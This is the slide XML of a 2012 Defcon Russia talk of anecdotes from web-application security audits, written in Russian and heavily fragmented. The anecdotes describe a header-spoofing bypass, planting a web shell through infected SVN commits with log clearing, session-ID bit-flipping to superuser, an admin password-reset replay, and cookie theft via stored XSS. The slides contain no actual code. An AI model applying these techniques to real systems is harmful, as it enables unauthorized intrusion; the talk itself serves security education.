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5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96C5E4-3CE9-4FDB-9984-51370051D97E}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>16.02.12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F267EC-5922-4860-8F10-FD0D97EEE89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4272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27FFE-A022-45B1-873C-01DDC273E38D}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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25BDC-55FB-4438-8F2C-4B2E594E7FF7}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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E3304-AFA4-4C94-BE3A-8DCFABB584E4}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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AFB21-085E-4242-9016-447F89E4212B}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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765A0-8496-4E70-A92D-D85C1EA7E664}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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B56FE-503F-4CF8-B503-4B8ABA2FBBD6}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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98581-3437-4373-8139-EC09C339BB08}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)</a:t>
            </a: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6549A-34D7-434D-8C44-FD74431AC9C9}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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B89F6-FE9E-4571-AFBE-EE0485A0FCE2}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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6D836-8077-4F41-B296-23B58646E447}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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444FB-A471-4782-BC36-5F5218AA8702}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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4C99B5-1C1F-4587-BE3E-16ABA0A4CD99}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>16.02.12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Defcon Russia (DCG #7812)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2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2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6000" dirty="0" smtClean="0"/>
              <a:t>Funny hack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3100" dirty="0" smtClean="0"/>
              <a:t>Забавные истории из практики анализа защищенности веб-приложений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16/02/2012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DCG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#7812</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>г. Москва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6372200" y="5106771"/>
            <a:ext cx="22322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by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>@d0znpp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>d0znpp#@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ONsec.ru</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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28384" y="6021288"/>
            <a:ext cx="727448" cy="65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 descr="C:\Users\Alexej\Desktop\trash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40650" y="115888"/>
            <a:ext cx="1262063" cy="1233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FUN#4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Очень большой портал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14:10 Какой ты большой и красивый</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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15:22 Ну тут на полгода скриптов хватит</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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16:10 Надо чего-нибудь найти уже</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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17:03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Пробрутим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>поддомены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17:30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Так</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>beta.domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>403 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forbidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>17:40 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Пробрутим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> заголовок </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-Real-IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Forwared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>по локальным адресам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Defcon Russia (DCG #7812)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10</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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122946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FUN#4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Очень большой портал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 smtClean="0"/>
              <a:t>18:10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Набрутили</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> внутреннюю сетку, зашли</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>18:30 На бете куча левых скриптов для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>дебага</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>и совсем простые пароли</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>18:55 Есть веб-шелл</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>30 Хорошо настроена ОС, но вот </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SVN… 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20:01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Заражаем пару скриптов в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>коммитах</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> и чистим </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>логи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10:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>0 Выкатили новую версию, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>веб-шелл на боевом получен =)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Defcon Russia (DCG #7812)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11</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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8264" y="4941168"/>
            <a:ext cx="21971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4073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8185" y="3814536"/>
            <a:ext cx="2880320" cy="3012887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FUN#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Шифрованный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState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 smtClean="0"/>
              <a:t>12:10 Привет, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dot NET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12:50 Привет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>фильтр</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>13:45 Будем искать обходы логики</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>13:51 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>зашифрован :(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>14:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>1 Попробуем поломать авторизацию</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>15:01 Восстанавливаем свой пароль на почту и получаем код активации</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>15:30 Вводим код активации на сайт и смотри что происходит дальше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Defcon Russia (DCG #7812)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12</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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902091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8185" y="3814536"/>
            <a:ext cx="2880320" cy="3012887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FUN#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Шифрованный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState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 smtClean="0"/>
              <a:t>15:3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> После ввода валидного кода отправляется второй </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>запрос с логином и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState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15:32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>О</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>ткрывается диалог ввода нового пароля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15:33 Отправляем запрос </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>еще раз, с тем же </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>но логином </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>13:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>34</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> Открывается диалог ввода нового </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>пароля</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>13:35 Пробуем авторизоваться под </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>с новым паролем</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>13:36 Получаем профит и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>админку</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean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Defcon Russia (DCG #7812)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13</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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593571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Спасибо! Вопросы?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@d0znpp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>d0znpp@ONsec.ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean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Defcon Russia (DCG #7812)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14</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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968054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Откуда дровишки?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Проведение коммерческих аудитов безопасности веб-приложений 2009-2012 гг.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Исследования популярных </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>веб-приложений ради интереса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err="1" smtClean="0"/>
              <a:t>Допиливание</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> и разбор </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>опубликованных уязвимостей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Defcon Russia (DCG #7812)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2</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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0232" y="2922736"/>
            <a:ext cx="2298700" cy="3530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за дровишки?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Клиентские уязвимости веб-приложений</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Серверные уязвимости веб-приложений</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Системные уязвимости (уровень ОС)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Получение доступа к веб-приложению</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Повышение привилегий ОС (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>юникс</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)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Defcon Russia (DCG #7812)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3</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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731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9204" y="821184"/>
            <a:ext cx="3289300" cy="24638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FUN#1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Забавная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3400" dirty="0" smtClean="0"/>
              <a:t>01:00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0"/>
              <a:t> Мало функционала. Грустно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0"/>
              <a:t>уныло, скучно.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>01:10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Все закрыто авторизацией.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0"/>
              <a:t>01:40 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>Набрутилось</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>demo/demo123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>01:50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Ничего внутри аккаунта нету, мало прав</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>04:20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0"/>
              <a:t>НУХЗ. Может ид. сессии попробовать подобрать?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Defcon Russia (DCG #7812)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4</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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184850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9204" y="821184"/>
            <a:ext cx="3289300" cy="24638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FUN#1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Забавная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Bit-Flip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10100111001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0100111001-&gt;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>100111001-&gt;…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>05:13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Да какого х</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>акера</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>? Ид. прав лежит в ид. сессии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.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06:01 Начали перебирать конкретный байт сессии и нашли идентификатор прав </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>суперпользователя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Defcon Russia (DCG #7812)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5</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\Alexej\Desktop\trash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06477" y="1852"/>
            <a:ext cx="737523" cy="720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933213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FUN#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>А как вы готовите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS?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/>
              <a:t>22:00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> Найдем инъекцию и будет все хорошо</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>А может и не найдем инъекцию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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11:40 Ладно, запустим </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>снифать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>хранимкой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19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
